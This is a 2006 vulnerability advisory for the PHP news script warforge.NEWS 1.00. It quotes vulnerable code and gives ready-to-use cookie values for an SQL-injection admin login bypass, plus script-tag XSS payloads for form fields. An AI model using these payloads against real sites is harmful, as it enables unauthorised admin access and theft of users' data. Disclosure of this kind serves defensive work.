warforge.NEWS exploit
i've paste it on: http://forum.zone-h.org/viewtopic.php?t=5468
-= warforge.NEWS =-
yamcho
April 26, 2006
SQL Injection
XSS
warforge.NEWS 1.00
warforge.NEWS is a script designed for easy use/implementation. It has a
full featured administration section and is powered by a mysql database.
SQL Injection
In the file authcheck.php there is a flaw, that can allow a user to
login as Admin.
The code is:
[…]
if(isset($_COOKIE["authaccess"]) || isset($_COOKIE["authusername"])) {
// This checks to make sure the username and password in the cookie are
actual users,
// this checks everytime you load a page to prevent cookie spoofing
$usern = $_COOKIE["authusername"];
$pass = $_COOKIE["authpassword"];
mysql_connect($db_Host, $db_Username, $db_Pass);
mysql_select_db($db_Database);
$cookiecheck = mysql_query("SELECT * FROM $usertable WHERE username =
'$usern' AND password = '$pass'");
[…]
So, if a remote user add this cookies to his cookies list:
1)
authusername=ADMINUSERNAME'/*;
authpassword=null;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;
or this:
2)
authusername=null;
authpassword=' OR '1'='1;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;
The query will be:
1) SELECT * FROM $usertable WHERE username = 'ADMINUSERNAME'/*' AND
password = '$pass'"
2) SELECT * FROM $usertable WHERE username = '$usern' AND password = ''
OR '1'='1'"
The remote user now is logged in as Admin.
XSS
In the file news.php there is a flaw, that can allow a user to
make an XSS attack.
The code is:
[…]
if(isset($_GET["newcomment"]) == "yes") {
// This is where it processes the mysql to add a new comment
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$comment = $_POST["comment"];
[…]
Some of this camps can be use to make an XSS attack.
So, if a remote user use this
><script>alert(document.cookies);</script>
into 'Your Name', 'Title' and 'Comment' form's field, he can gain data
information.
In the file newsadd.php there is a flaw, that can allow a user that as
login to
make an XSS attack.
The code is:
[…]
if(isset($_POST["addstory"]) == "1") {
// add the news post error checking blah blah
$title = $_POST["title"];
$author = $_COOKIE["authusername"];
$email = $_COOKIE["authemail"];
$newspost = $_POST["newspost"];
[…]
Some of this camps can be use to make an XSS attack.
So, if a remote user use this
<script>alert(document.coockies);</script>
into 'Title' and/or 'Story' form's field, he can gain data information.
yamcho
yamcho[at]email[dot]it
–
Email.it, the professional e-mail, gratis per te: http://www.email.it/f
Sponsor:
DVD vergini: acquista online a prezzi vantaggiosi!
Clicca qui: http://adv.email.it/cgi-bin/foclick.cgi?mid=4589&d=27-4